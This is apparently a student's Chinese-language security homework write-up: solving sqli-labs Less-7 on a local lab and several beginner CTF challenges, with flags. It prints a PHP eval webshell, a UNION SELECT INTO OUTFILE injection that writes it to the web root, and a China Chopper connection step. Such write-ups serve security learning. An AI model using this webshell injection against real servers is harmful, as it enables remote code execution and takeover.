我的网安作业2/14

一、sql-labs

Less7

1.前期准备
在PHPstudy下的PHPTutorial/mysql/my.ini文件里面添加一句。（为了后期支持文件的读写）

2.一句话木马
在phpStudy\PHPTutorial\WWW的文件夹下新建一句话木马文本。

根据后面出现的bug，正确的语句应该是：

<?php @eval($_POST["a"]);?>

启动中国菜刀：

连接木马：

两个基本函数：load_file()读取本地文件；into outfile 写文件。
3.判断是否存在SQL注入

http://127.0.0.1/sqli/Less-7/?id=1

http://127.0.0.1/sqli/Less-7/?id=1'

存在SQL注入。
4.构造正确的SQL语句，判断列数

http://127.0.0.1/sqli/Less-7/?id=1')) order by 3--+
http://127.0.0.1/sqli/Less-7/?id=1')) order by 4--+

5.写入一句话木马
发现根本不能写入，后来发现应该把secure_file_priv 值设为空，表示不限制mysqld在任意目录的导入导出。
在my.ini文件中修改secure_file_priv 值

然后重启PHPstudy，重启MySQL服务，进行查看。

http://127.0.0.1/sqli/Less-7/?id=-1')) union select 1,2, '<?php @eval($_POST["a"]);?>' into outfile "F:\\phpStudy\\PHPTutorial\\WWW\\sqli\\Less-7\\test.php"--+

查看：

6.连接中国菜刀
访问木马：

http://127.0.0.1/sqli/Less-7/test.php

用中国菜刀连接：

二、CTF

1.Web

评论区大神的评论：
php==符号不能判断类型，在数字与字符串比较时会将字符串转化为数字进行比较，又因为网页会自动给字符串带上引号，因此构造参数?num=1"，或者?num=1.可以得到绕过得到flag

因此构造PHP语言。

http://114.67.246.176:17503/?num=1a

2.Web

可以f12,调试器，index源码

也可以用burpsuit进行抓包看源码信息。

将最后面的HTML源码：

 <!-- &#102;&#108;&#97;&#103;&#123;&#52;&#99;&#51;&#57;&#48;&#101;&#56;&#56;&#101;&#54;&#53;&#98;&#56;&#100;&#57;&#97;&#53;&#54;&#100;&#101;&#102;&#53;&#56;&#98;&#102;&#97;&#99;&#49;&#50;&#55;&#56;&#53;&#125

进行解码得到flag。

3.MISC

下载压缩包并用HXD打开查找是否有相关信息：

得到flag：flag{d316759c281bf925d600be698a4973d5}

4.Crypto

Brainfuck和ook加密，用https://ctf.bugku.com/tool/brainfuck进行解密。

得到flag。

补充：相关知识见https://www.dazhuanlan.com/2020/03/08/5e64faca66d65/
总结：由于是在春节期间做的，过程有点粗糙，并且sql-labs的学习也没有达到目标。而且在做题的过程中我发现我有些网络安全的相关知识太欠缺了，比如PHP语言，各种加密算法；刚开时学习的时候就想学习PHP语言，结果这都是我学习的第三周了，还没有开始，我的拖延症呀，开学之前一定开始学习PHP语言。冲呀。